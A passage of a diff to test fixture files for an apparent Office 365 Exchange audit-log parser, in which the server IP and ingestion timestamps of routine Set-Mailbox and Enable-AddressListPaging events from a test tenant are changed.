(15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853002Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:17\",\"ExternalAccess\":true,\"Id\":\"2202ec45-7abc-49dd-e35e-08d7adfc0e15\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -737,12 +737,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -773,7 +773,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { @@ -785,8 +785,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177585200Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:04\",\"ExternalAccess\":true,\"Id\":\"a0063917-bb25-4c17-fe2e-08d7ac0f0769\",\"ObjectId\":\"testsiem.onmicrosoft.com\",\"Operation\":\"Enable-AddressListPaging\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"DoNotUpdateRecipients\",\"Value\":\"True\"},{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853006100Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:04\",\"ExternalAccess\":true,\"Id\":\"a0063917-bb25-4c17-fe2e-08d7ac0f0769\",\"ObjectId\":\"testsiem.onmicrosoft.com\",\"Operation\":\"Enable-AddressListPaging\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DoNotUpdateRecipients\",\"Value\":\"True\"},{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -806,12 +806,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -854,7 +854,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { @@ -866,8 +866,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177588300Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:58\",\"ExternalAccess\":true,\"Id\":\"a324e83b-d1a3-4855-db2a-08d7ac0f277b\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853010200Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:58\",\"ExternalAccess\":true,\"Id\":\"a324e83b-d1a3-4855-db2a-08d7ac0f277b\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -887,12 +887,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -935,7 +935,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { @@ -947,8 +947,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177590900Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:15\",\"ExternalAccess\":true,\"Id\":\"ebda487f-6177-432a-e91d-08d7adfc0d0d\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853013600Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:15\",\"ExternalAccess\":true,\"Id\":\"ebda487f-6177-432a-e91d-08d7adfc0d0d\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -968,12 +968,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -1016,7 +1016,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { @@ -1028,8 +1028,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177593700Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:09\",\"ExternalAccess\":true,\"Id\":\"7dafe4a3-487a-46ec-dadc-08d7ac0f2e06\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853018300Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:09\",\"ExternalAccess\":true,\"Id\":\"7dafe4a3-487a-46ec-dadc-08d7ac0f2e06\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -1049,12 +1049,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -1097,7 +1097,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { @@ -1109,8 +1109,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177598900Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:15\",\"ExternalAccess\":true,\"Id\":\"7b5e608f-0a09-4251-8922-08d7adfc0d15\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (15.20.207.17)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", + "ingested": "2021-12-09T13:42:30.853023800Z", + "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:15\",\"ExternalAccess\":true,\"Id\":\"7b5e608f-0a09-4251-8922-08d7adfc0d15\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", "kind": "event", @@ -1130,12 +1130,12 @@ }, { "server": { - "address": "15.20.207.17", + "address": "67.43.156.13", "domain": "HE1PR0102MB3228", - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "destination": { - "ip": "15.20.207.17" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -1178,7 +1178,7 @@ }, "related": { "ip": [ - "15.20.207.17" + "67.43.156.13" ] }, "organization": { @@ -1190,8 +1190,8 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-06-17T07:32:50.177602300Z", - "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:09\",\"ExternalAccess\":true,\"Id\":\"7dafe4a3-487a-46ec-dadc-08d7ac0f2e06\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 